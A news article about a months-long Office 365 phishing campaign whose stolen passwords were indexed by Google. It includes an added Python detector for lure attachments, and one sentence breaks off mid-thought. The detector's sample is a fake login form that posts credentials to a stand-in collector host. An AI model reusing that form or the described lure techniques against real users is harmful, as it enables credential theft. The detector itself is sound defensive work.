Hackers who hit thousands of organizations around the world in a massive phishing campaign forgot to protect their loot, and Google indexed the stolen passwords so that they turned up in public searches.
The phishing campaign has been running for more than half a year and uses dozens of domains to host the phishing pages. It received continuous updates to make the fake Microsoft Office 365 login prompts look more realistic.
Creds in clear view
Despite relying on simple techniques, the campaign has successfully bypassed email protection filters and collected at least 1
Researchers at the cybersecurity companies Check Point and Otorio, who analyzed this campaign, discovered that the hackers had exposed the stolen credentials to the public internet.
In a report published today, they explain that the attackers exfiltrated the captured data to domains they had registered specifically for the task. Their mistake was to store the data in a publicly accessible file that Google then indexed.
As a result, a Google search for a stolen email address or password can return the exfiltration file itself, as shown in the screenshot below:
Researchers at the two cybersecurity companies say the attackers also compromised legitimate WordPress servers to host the malicious PHP page served to the victims.
“Attackers generally prefer to use compromised servers instead of their own infrastructure because of the well-known reputation of existing sites,” the researchers explain.
By processing information from around 500 entries, the researchers were able to determine that companies in the construction, energy and IT sectors were the most common targets for these phishing attacks.
Simple, effective phishing
The attackers used several phishing email themes to entice potential victims to load the landing page that collected their Microsoft Office 365 username and password.
The malicious emails carried the target’s first name or company name in the subject line and claimed to deliver a Xerox scan notification as an HTML attachment.
Opening the attachment loads it in the default browser, which shows a blurred image overlaid with a fake Microsoft Office 365 login form. The username field is already filled with the victim’s email address, which usually lowers any suspicion that the form is stealing logins.
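An attachment in the shape described above can be flagged before it reaches a user. The following is an added example, not code from the report or the researchers: it scans an HTML attachment for the three tell-tale features of this lure (a password field, a username field prefilled with an email address, and a form posting credentials to an external URL). The sample attachment, its domain and its path are constructed placeholders, not indicators from the report.

```python
import re
from html.parser import HTMLParser

# Constructed sample of an HTML attachment shaped like the lure described
# above; the domain and path are placeholders, not real indicators.
SAMPLE_ATTACHMENT = """
<html><body style="background:url(blurred-scan.png)">
<form action="https://phish-collector.example/post.php" method="post">
  <input type="text" name="username" value="victim@company.example">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>
"""

EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")

class LoginFormScanner(HTMLParser):
    """Record form actions, password fields and prefilled email values."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password = False
        self.prefilled_email = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None when written bare
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input":
            if (a.get("type") or "").lower() == "password":
                self.has_password = True
            elif EMAIL_RE.fullmatch((a.get("value") or "").strip()):
                self.prefilled_email = True

def assess_attachment(html):
    """Return the lure indicators found in an HTML attachment (empty if none)."""
    scanner = LoginFormScanner()
    scanner.feed(html)
    findings = []
    if scanner.has_password:
        findings.append("password field inside an email attachment")
    if scanner.prefilled_email:
        findings.append("username field prefilled with an email address")
    for action in scanner.actions:
        # A relative action cannot leave the attachment; an absolute URL can.
        if re.match(r"https?://", action, re.I):
            findings.append(f"form posts credentials off-site to {action}")
    return findings
```

Calling `assess_attachment(SAMPLE_ATTACHMENT)` returns all three indicators for the constructed sample; a mail gateway would quarantine or tag any attachment that triggers more than one of them.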
To keep the campaign under the radar, the actor used compromised email accounts to distribute the fake messages. In one attack, they impersonated the German hosting provider IONOS by 1&1.
Although this campaign started in August, the researchers found phishing emails from the same threat actor dating back to May 2020.
Google indexing the sites where hackers store stolen data is not a first, but it shows that not all malicious actors are skilled enough to protect their operation. Even if they are never identified, their activity can at least be disrupted.